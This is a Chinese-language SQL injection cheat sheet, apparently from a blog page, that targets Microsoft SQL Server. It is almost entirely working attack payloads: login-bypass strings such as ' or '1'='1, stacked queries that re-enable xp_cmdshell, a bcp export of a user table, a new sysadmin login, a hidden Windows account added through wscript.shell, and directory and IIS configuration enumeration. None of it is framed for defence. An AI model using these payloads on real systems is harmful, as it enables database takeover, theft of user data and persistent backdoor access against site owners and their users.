--注入测试语句(登录)
--' and 0<(select COUNT(*) from BJ_User) or '1'='1
' or '1'='1
--导出表内容
EXEC master..xp_cmdshell 'bcp BJ_CARCESHI.dbo.bj_user out c:\Temp.xls -c -q -S"." -U"sa" -P"1"'
--连接的用户
SELECT System_user
--开启cmdshell
SELECT * FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell'
EXEC master.dbo.sp_addextendedproc xp_cmdshell,'xplog70.dll'
EXEC master.dbo.sp_addextendedproc xp_cmdshell,'c:\inetpub\wwwroot\xplog70.dll'
--开启xp_cmdshell部分
--------------------------------------------------
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
--通过xp_cmdshell执行shell命令的部分
--------------------------------------------------
Exec xp_cmdshell 'bcp '
GO
--关闭xp_cmdshell部分
-----------------------------------------------------
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 0
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO
--添加sql用户
exec master.dbo.sp_addlogin china,123
exec sp_addsrvrolemember 'china','sysadmin'
--添加系统用户
use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c net user jiaoniang$ 1866574 /add";
--得到数据库名(从1到5都是系统的id,6以上才可以判断)
select name from master.dbo.sysdatabases where dbid>5
create table dirs1(paths varchar(1000),p varchar(1000))
insert dirs1 exec master.dbo.xp_dirtree 'c:\'
delete from dirs1
insert dirs1 exec master.dbo.xp_cmdshell 'dir c:\ /B/D'
select top 1 paths from dirs1
"select * from user1 where username='"+"' or '1'='1'";"+" and userpwd='' and 0=(select top 1 paths from dirs1)"
' or '1'='1
';EXEC master.dbo.sp_addextendedproc xp_cmdshell,'xplog70.dll';select '
exec master..xp_cmdshell 'cmd /c cscript c:\inetpub\adminscrips\adsutil.vbs enum w3svc/1/root>a.txt'
CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500))
sql注入
最新推荐文章于 2024-02-04 23:24:44 发布